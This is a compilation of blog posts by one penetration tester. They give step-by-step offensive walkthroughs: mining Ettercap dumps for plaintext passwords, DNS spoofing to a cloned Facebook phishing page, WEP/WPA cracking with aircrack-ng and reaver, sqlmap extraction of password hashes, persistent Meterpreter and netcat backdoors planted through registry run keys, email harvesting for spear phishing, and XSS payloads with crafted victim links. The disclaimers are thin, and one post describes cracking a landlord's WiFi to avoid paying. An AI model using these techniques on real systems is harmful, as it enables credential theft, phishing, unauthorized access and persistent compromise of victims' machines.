HuntPass.py: Python Script That Searches for Passwords [Or Any String] in a File Then Saves Results to a New File

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

It is amazing how people on a shared LAN are still typing away their confidential information over http (non-SSL, un-encrypted) links. Someone sniffing the LAN could easily capture such information in plaintext.

During a recent test, I used Ettercap for sniffing the local LAN.

Since this was a large internal network with a lot of users, it was able to discover a LOT of passwords in transit in plaintext form over the link. After dumping, the problem was to sort these passwords in the Ettercap dump file. So I wrote this simple python script.

Functionality: The script looks for user-supplied passwords strings in a given file and then stores the 'unique' passwords found to a new file. It just gets things done. Please feel free to improve it if you feel the need to do so.

Usage: python HuntPass.py <InputFile> <OutputFile> <SearchString>

Download: Github - https://github.com/lifeofpentester/huntpass

Example:

Here, I have saved my Ettercap sniffer results to a file called 'etterlog'. This is my <InputFile>

I am looking for lines with the word "PASS" ( for password) in them. I want these passwords saved in a file called 'Passwords.txt'


             #python HuntPass.py etterlog Passwords.txt PASS

Only two lines in 'etterlog' had 'PASS', so total passwords found are 2 in this case.

They are stored in a separate file called 'Passwords.txt'.

If a new user misses out an argument while running the program, it exits printing 'Usage' information.

If you're new to Python, you might like to read the code. Here it is:

#!/usr/bin/python

import sys  #Taking Arguments in Terminal
import os   #Clearscreen
import time

if len(sys.argv) < 4:  #First Argument is always the program name
        sys.exit('Usage: python HuntPass.py <InputFile> <OutputFile> <SearchString>')    #Exit if New User doesn't give all the Arguments

os.system('clear')

time_on_your_system = time.asctime(time.localtime(time.time()))

print "\t\t_____________", time_on_your_system, "_____________"
print "\n\t\t_____A Small Script to find Passwords in Dumps_____"

print "\n\t\t####################################################"

print "\n\t\t#________________Written by Pranshu_________________#"

print "\t\t______________________________________________________"



filename = sys.argv[1]  #Input File

newfile = sys.argv[2]   #Output File

f1 = open (filename, "r") #Read Mode

f2 = open (newfile, "a+") #Append Mode

search_string = sys.argv[3] #Text to Search

print "\n\tLooking in", filename + " | " + "Storing Result in", newfile + " | " + "Searching for", search_string

flag = raw_input("\n\n\t\tProceed? (y/n): ")

if flag == 'y':
    lines_seen = set()  #A Data Structure to store lines seen, to prevent duplicate passwords while saving

    total_pass = 0

    for line in f1:
        if line not in lines_seen:  
            if search_string in line:
                f2.write(line)
                lines_seen.add(line)
                total_pass = total_pass + 1
    print "\n\t\tTotal Passwords found are: ", total_pass
    print "\n\t\tSaved in ", newfile
f1.close()
f2.close()
print "\n\t\t________________________QUITTING!____________________\n\n"

Like I said, feel free to improve it according to your needs.

How To Spoof DNS In Kali Linux / Facebook Phishing Page Using Social Engineering Toolkit In Kali Linux / BackTrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

I was recently asked to demonstrate quickly how DNS can be spoofed using Kali Linux, and how the traffic can be forwarded to a fake phishing page. I decided to demonstrate by phishing the Facebook page and spoofing the DNS to point facebook.com to my machine's IP address where I am hosting a fake page using social engineering toolkit.

Here's the procedure:

Host a phishing page using se-toolkit: Website Attack Vectors -> Creditials Harvestor -> Clone website / Use Web Template

 

As you can see I used a template of Facebook and SET hosted this on my IP: 192.168.0.10 at port 80.

Now I need to make sure traffic meant for facebook.com is redirected to my IP, for that I can use a DNS Spoof plugin available in ettercap

Change the contents of the file etter.dns, so the facebook.com points to your own IP.

Then load up "ettercap --g" and goto Plugins -> Manage the Plugins -> double click DNS Spoof plugin. Make sure you see the '*' next to it

Next, ARP poison all the hosts in the network, so that all the traffic passes through your machine. Start sniffing (read up on ARP poisoning if you can't understand).

Wait for the sometime. When someone tries to access facebook.com then your ettercap window will tell you 'blah_blah.facebook.com' spoofed to '<your ip>'.

At the same time in your SET window you'll see 'we got a hit!!' along with some other info. If the victim is gullible enough to enter his/her credentials on your phishing page, you'll see those details in the SET window.

But you have to play the waiting game and hold on until someone tries to access the phished website.

Disclaimer: This Post was only to demonstrate a concept; no Facebook hacking is endorsed or intended. This will only work on internal networks, that is, machines susceptible to your ARP poisoning attacks.

How To Hack Wifi and Crack its Password | Hacking Wifi | WEP + WPA

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

I recently traveled to Delhi in order to collaborate with an information security firm there.

The place that I rented for my short stay demanded an extra amount if I wanted to access the Internet. That didn't go down with me too well. They were using WEP, WPA and WPA2 security in the different WiFi HotSpots that they were running.

WEP Cracking

No doubt, WEP is the easiest to crack.

Here's how to crack WEP:

#airmon-ng start wlan0

 

Notice that the monitor mode is enabled on mon1; take note of this. We will need this interface later on.

Start dumping data packets with airodump:

#airodump-ng mon1

You'll see all the Wifi hotspots available in your area. Here we see different security like WEP, WPA and WPA 2. As WEP is the easiest to crack, choose one with WEP security.

Also, it is important to note other information here as that will determine how easily you get into the WiFi:

• The BSSID is the MAC address of the Wifi hotspot.
• Pwr tells you about the signal strength.
• Beacon signals are sent by the hotspot to indicate its presence.
• Data is the actual packets that we are interested in. The more data packets we have, the more certain we are to crack the hotspot.
• CH tells you the channel being used by the hotspot

Here I am testing something called 'BIPL'.

So I use airodump to focus on dumping packets from this paricular BSSID and store them in a file:

#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1

-w specifies the file to write to, -c specifies the channel and you know what --bssid is for

Now packet capture starts, and we play the waiting game. Wait to collect enough packets before trying to crack the password. Usually, we wait till we grab around 20000 packets.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.

If it is taking too long to grab required number of packets, then you can use something called aireplay:

#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1

-b option is to specify the bssid
-h is to specify your hardware address

aireplay-ng will start generating bogus traffic, so that you can grab enough data packets fast.

Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap

This cap file is where we saved the captured packets:

After a while Aircrack-ng will give you the cracked password:

It turns out, the password is someone's cell phone number. I traced its location and it's based in Delhi. A bad practice to use personal information as password.

  
WPA Cracking

A detailed article on WPA / WPA2 cracking is here

WPA cracking can be a bit more uncertain and complicated.

One thing to remember while WPA Cracking, is that you need to grab the WPA handshake. Use airodump to dump packets from the target WPA network (just like in WEP) but wait until you see 'Captured WPA Handshare' (or something close to that) on the top right corner.

Then stop the packet capture.

Load up aircrack-ng and provide it the .cap file where the handshake is located (saved by airodump previously).

Also provide a wordlist to aircrack-ng. Remember this is a 'dictionary based' attack:

#aircrack-ng blah_blah.cap -w /root/dic/darkc0de.lst

Aircrack will try passwords from the dictionary file against the .cap file. This might take a long time to crack and success depends on the kind of dictionary file you are using and how strong the password is.

Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.

Here's the sample use of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

• -i is for interface
• -a "94.... " is the bssid of hotspot
• -vv for verbose mode
• -c to specify the channel

For details on WPA / WPA2 Cracking, Check out this article

Disclaimer: This post is merely to demonstrate the inherent risks involved in using outdated WiFi security. This test was done under simulated conditions and does not endorse public or private WiFi hacking.

Setting Up VirtualBox / Virtual Lab for Penetration Testing in Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Configuring a virtual lab on your PC becomes indispensable if you wish to test different attacks under controlled conditions. You don't always have access to shared LANs where there a lot of vulnerable machines that you're allowed to experiment on. For example: ARP poisoning on a large LAN would bring down the network quickly, and you won't have a good time explaining to the network administrator why you weren't testing in an isolated environment. Hence, for numerous reasons, it is best if you work in virtual environments while testing.

Install VirtualBox on your Kali or Backtrack (or any other linux):

#apt-get install virtualbox

 OR

 System Tools -> Add / Remove Software

Start VirtualBox after installation

Applications -> Accessories -> VirtualBox

You need to have the ISO Image of the OS you want to host on the virtualbox. (I had a Windows XP Image)

In VirtualBox Menu:

New -> Allot Name and Type of OS ->  Select RAM Memory Size ->  Create New Hard Disk -> VDI -> Dynamically Allocated -> Summary -> Create

Now in Main Menu of VirtualBox you'll notice the name of the machine you just created.

Start -> Point to the ISO Image of the OS -> Follow OS installation Procedures

After the normal OS install procedures, you will have the virtual OS ready, running on Linux host machine.

For networking between the Host and Virtual machine, I chose 'internal' network option in VirtualBox and I was able to ping the Host and Virtual machine from each other

You can go ahead and try simulated attacks on this Virtual OS, and it gives you more control over the experiment (as you can increase or decrease security on the vulnerable host at will).

Hacking With Armitage on Kali Linux / Backtrack

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

If you are beginning to learn, Armitage is not something you would want to start with. It is alright to quickly automate some routine Metasploit tasks using Armitage, but if you're trying to learn something, Armitage adds a level of abstraction and makes you a perfect script kiddie.

Learning stuff on 'msfconsole' or 'msfcli' before moving on to Armitage, is a better approach in my opinion.

The tool is mostly self-explanatory due to its GUI.

Here, I am simulating an attack on a Windows XP system using Armitage on Kali Linux.

Bring up Armitage by typing:

#service postgresql start
#armitage

First, I need to 'discover' this host.

Hosts -> nmap scan

OR, I could manually 'add host' by providing its IP.
 
Now I can see this windows XP host in Armitage workspace. From here, I could manually search for vulnerabilities on the Windows XP and then try to exploit them, but I chose the easy way on Armitage, which is 'Hail Mary'.

Attacks -> Hail Mary

It tried some common exploits relating to available services on victim machine and gave me the 'red' around that host, which means the host is compromised.

I grab the password hashes that I can try to crack later on.

I gain access to cmd.exe 'command prompt' in windows.

 I set up a persistant Meterpreter backdoor on the hacked windows XP for later access.

I view the processes running on hacked machine.

I take screenshots of activities on the hacked machine.

 I tried connecting with VNC viewer to the remote machine.

If you're a part of a Pen Test team, then one of you can host an Armitage server and other can 'connect' to it, so that you can collaborate on the project.

At the connect window, you need to enter the host name of the fellow Pen Tester hosting the Armitage server, the port number, and the username and password that he/she has provided you.

At the next window, confirm the fingerprint.

Pick a 'Handle' for the session.

And then you can join in with your Pen Test Team and work in collaboration on the project

There's a bunch of other stuff you could do with Armitage, please feel free to explore further.

How To Hack A Website - Simple Demo | Kali Linux / BackTrack | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


I was testing for SQL vulnerabilities at random over the Internet and found a whole lot of websites that are still vulnerable to SQL injections. I refrained from any further testing due to lack of explicit permission by owners.However, here's a demonstration--from one of my penetration testing projects--of how these websites may be hacked if the SQL vulnerabilities are left unpatched.

Tip: Read up a little on SQL injection. For example, start with figuring out what this is trying to do:

SELECT * FROM users WHERE name = '' OR '1'='1';

The tool sqlmap comes preloaded with both Kali and Backtrack.

If the dynamic parameter in the php script is vulnerable then sqlmap will try to inject code into it.

I've blacked out the website's information for obvious reasons.

First, get the tool to list the available databases:

The 'information_schema' DB is where MySQL stores the schema, so I'm not interested in that one. The other one is my target.

I try to grab the 'tables' available in this other database:

There are a bunch of tables that get listed, among those the table 'members' looks interesting, grab the columns for that table:

 And I see a column with passwords, I'll get the hashes here (I've seen some web admins who are so careless that they store the passwords in plaintext which would require no password cracking):

Finally, I get my hands on the password hashes and the reverse engineering begins from there (use jtr):

Unless you actually know what sqlmap did for you in the background, it is not that interesting and makes you a perfect script kiddie.

Once you crack the password hashes, you can login to the website's control panel as 'admin' and then change html files (index.html for homepage). That would be website defacing.

Disclaimer: As stated in the beginning, this excerpt is from an authorized penetration test. If you notice an SQL weakness in a website, please refrain from engaging in illicit activities and inform the web administrator.

Persistant Meterpreter Service Backdoor | Making a Backdoor on Hacked Machine for later entry | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

After penetrating a system during testing, it's wise to make a backdoor on the system for easy entry later on. I followed the Metasploit Unleashed examples to make a persistent Meterpreter Service.

So payload was the Meterpreter module, and the 'lhost' and 'lport' belong to my attacking machine.

It created the vbs script in the victim computer's "C:\\WINDOWS\TEMP\" directory, executed this agent with process ID 3676, and manipulated start up Registry entries to make sure it runs after each reboot.

Using ophcrack in Kali Linux / Backtrack to Crack Hashes | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn


Ophcrack is GUI tool that can be used for the purpose of cracking password hashes. Perhaps the main attraction of using this tool is its ability to deploy rainbow tables while cracking the password. This makes the process of brute force cracking faster.

At this point, it is essential that you understand the importance of rainbow tables in a brute force attack. As you know, a hash is a one way function and cannot be reversed. So we can't convert the password hashes back to their corresponding plaintext forms. For this reason, during a brute force attack, we take a potential passphrase (in plaintext) and convert it to its hash form. Then we can compare this hash with the password hash and if there is a match, we know that this plaintext is the passphrase. Basically, during a brute force attack, a lot of time and CPU power is wasted in computing the hashes. Rainbow tables are 'pre-computed hashes'. So once you have a rainbow table, all you need to do is 'compare' the hash in the rainbow table to the password hash you have obtained during penetration testing. Hence, you save considerable time and CPU cycles while hunting to the plaintext form of the passphrase.

Here's an example where I cracked some LM Hashes I grabbed from a machine during penetration testing (the hashes were obtained by using pwdump in Meterpreter).

You can load up any of these rainbow tables germane to the victim's OS. Click on 'install' to obtain them. They are large files and will take a while to download depending on your network bandwidth.

Ophcrack can speed up the Windows password cracking process during penetration testing, and if you test Windows system frequently, it would be prudent to have these rainbow tables saved on your local disk.

Email Harvesting in Kali Linux (Find out Login IDs to Bruteforce) | Kali Linux

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

 For the purpose of mass spamming or spear phishing, hackers use a module available in Metasploit that pulls email accounts of a particular organization from 'Google', 'Bing' and 'Yahoo'.

Hackers find it useful to perform online password attacks later on--it is important to know the IDs or usernames to before commencing the cracking process--during targeted attacks. As I mentioned, the list of email addresses can also be used for the purpose of mass mailing, phishing, or spear phishing.

So I conduct a such a test to pull email addresses from an organization of interest to me. First, I list all the options available to me relating to this module--using a standard Metasploit command 'show options'

Then, I set the 'domain' of the organization and the 'output' file where I wants the results (email addresses) saved, and 'execute' the module.

After a while, these are the results given back to me:

 
Bots crawl over the Internet looking for email addresses. In order to avoid being spammed, a mitigation strategy is to insert the email address in a graphic file, or to mention it in a custom format that the bot will not be able to comprehend as an email address. For instance, name [at] gmail [dot] com.

Basic XSS Attacks Demo, Examples | Pranshu

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Cross site scripting attacks are common. But for people new to penetration testing, they may seem a little convoluted at first (specially in case of beginners who don't have much experience with web languages). There's a whole lot of theory available all over the web on XSS so I'm not getting into that.

Given below are some of the simplest demonstrations of cross site scripting attacks.

This is a simple webpage:

http://www.insecurelabs.org/task/Rule1

As a penetration tester, you would  study the page and try to inject code in their 'Search' box. I insert

<h1>XSS Attack Demo - Pranshu</h1>

Press enter and notice the display of XSS Attack Demo - Pranshu
(Notice the use of header tags of HTML)

 Now try this in Search box:

<script>alert("You are Attacked by Pranshu")</script>

 See the window alert?

 You can even try a new window pop-up that can be used to open a new website (although most browsers now have pop-ups blocked by default)

 <script>window.open( "http://www.lifeofpentester.blogspot.com" )</script>

Link sent to Victim would look like

http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ewindow.open%28+%22http%3A%2F%2Fwww.lifeofpentester.blogspot.com%22+%29%3C%2Fscript%3E

You can also try other stuff like displaying an evil image on the website (kind of like defacing it)

<html><body><img src="http://fc05.deviantart.net/fs71/i/2012/257/8/b/hacker_skull_wallpaper_by_simon93_ita-d5enmvk.jpg"> </body> </html>

Link sent to victim:

http://www.insecurelabs.org/task/Rule1?query=%3Chtml%3E%3Cbody%3E%3Cimg+src%3D%22http%3A%2F%2Ffc05.deviantart.net%2Ffs71%2Fi%2F2012%2F257%2F8%2Fb%2Fhacker_skull_wallpaper_by_simon93_ita-d5enmvk.jpg%22%3E+%3C%2Fbody%3E+%3C%2Fhtml%3E

In this case your victim would follow your link and see something like this

Remember: The website is not actually defaced. It is just an "illusion" for that particular user who followed your specially crafted link.

In reality, why would the victim put this stuff in Search box?  They won't.

So we send them this malicious link which is specially crafted by the attacker:

http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ealert%28%22You+are+Attacked+by+Pranshu%22%29%3C/script%3E

A hacker will post something like this on a forum (somewhere where a lot of people can see it):

Hey guys!! New stuff on insecurelabs, check it out. Here's the link:

http://www.insecurelabs.org/task/Rule1?query=%3Cscript%3Ealert%28%22You+are+Attacked+by+Pranshu%22%29%3C/script%3E

Now to a savvy user the included script tags would act as a dead giveaway, but to a normal user, its just a link on insecurelabs.org and they might click.

Now imagine if in place of the harmless alert box, I point them to a malicious JavaScript code that get executed on their browser. Such a code can be used to steal cookies stored on the victim's machine.

Note: It is important to realize that though the victim ends up being exploited, the vulnerability actually lies on the web server. This is why many bounty hunters these days go after bounties that are awarded for discovering such flaws on a website that might affect its users.

Hacking with Meterpreter Session on Kali linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

In my last post, I demonstrated how a vulnerable system can be discovered quickly using the nmap tool. We used the script 'smb-check-vulns.nse' belonging to the 'vuln' category. We used it in 'unsafe' mode which is very likely to crash the victim machine.

In this one, I exploit that system using Metasploit and obtain a meterpreter session:

We need to set the 'rhost' or remote host, the payload, and the 'lhost' or localhost. The standard Metasploit command 'exploit' will then run the module with these parameters configured.

Now:

- We can try to dump the password hashes of this system.

- We can upload and execute a nc.exe (netcat) file on hacked system to gain access later (backdoor).

Uploading Netcat on Hacked Machine as a Backdoor | Kali Linux / Backtrack | Post Exploitation

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

Netcat, the swiss army knife, can be used as a backdoor but I would advise against it because it has no authentication. Anyone who finds netcat server on the victim's computer can control that machine.

First, upload Netcat on the remote machine (it is present in "/usr/share/windows-binaries" path in Kali Linux or Backtrack).

Next, enumerate the registry keys in the 'run' category (that run after each reboot).

Now use 'reg setval' to set the value under 'run' in the registry of victim's machine.

Then use 'reg queryval' to see that it's successfully added.

Use the 'netsh firewall add portopening' command in Windows shell to allow port opening at 455 (where netcat will listen).

Execute nc.exe using:

#meterpreter> execute -f nc.exe

Now you will see nc.exe as a process on victim's machine.